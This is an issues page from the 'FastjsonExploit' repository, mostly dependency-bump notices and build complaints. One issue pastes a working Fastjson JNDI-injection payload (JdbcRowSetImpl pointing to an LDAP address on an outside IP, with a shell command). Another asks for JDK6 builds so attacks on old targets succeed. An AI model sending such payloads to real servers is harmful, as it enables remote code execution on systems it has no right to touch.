FastjsonExploit icon indicating copy to clipboard operation
FastjsonExploit copied to clipboard

Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架)

Results 9 FastjsonExploit issues
Sort by recently updated
recently updated
newest added

当使用mvn编译的时候,发现只支持jdk7+。但是好多目标环境都是使用的jdk6的版本,所以攻击失败。 因为jdk向下兼容的原因,建议修改mvn打包的依赖为jdk6。

Bumps [fastjson](https://github.com/alibaba/fastjson) from 1.2.24 to 1.2.83. Release notes Sourced from fastjson's releases. FASTJSON 1.2.83版本发布(安全修复) 这是一个安全修复版本,修复最近收到在特定场景下可以绕过autoType关闭限制的漏洞,建议fastjson用户尽快采取安全措施保障系统安全。 安全修复方案 :https://github.com/alibaba/fastjson/wiki/security_update_20220523 Issues 安全加固 修复JDK17下setAccessible报错的问题 #4077 下载 https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/ 文档 https://github.com/alibaba/fastjson/wiki/%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98 源码 https://github.com/alibaba/fastjson/tree/1.2.83 fastjson 1.2.79版本发布,BUG修复 这又是一个bug...

dependencies

Bumps [spring-beans](https://github.com/spring-projects/spring-framework) from 4.3.7.RELEASE to 5.3.18. Release notes Sourced from spring-beans's releases. v5.3.18 :star: New Features Restrict access to property paths on Class references #28261 Introduce cancel(boolean mayInterruptIfRunning) in ScheduledTask...

dependencies

C:\Users\Limite\Desktop\FastjsonExploit\target>java -jar FastjsonExploit-0.1-beta2-all.jar JdbcRowSetImpl1 ldap://111.229.24.83:8090/Exploit "/bin/bash -c ls" [*] payload build success! {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://111.229.24.83:8090/Exploit","autoCommit":true}没有执行系统命令

mvn编码不对,rmi用不了

在windows下进行mvn clean package -DskipTests编译是,出现编码gbk的不可映射字符 可以在pom.xml文件中增加以下内容解决 UTF-8

Bumps [spring-beans](https://github.com/spring-projects/spring-framework) from 4.3.7.RELEASE to 5.2.20.RELEASE. Release notes Sourced from spring-beans's releases. v5.2.20.RELEASE :star: New Features Restrict access to property paths on Class references #28262 Improve diagnostics in SpEL for...

dependencies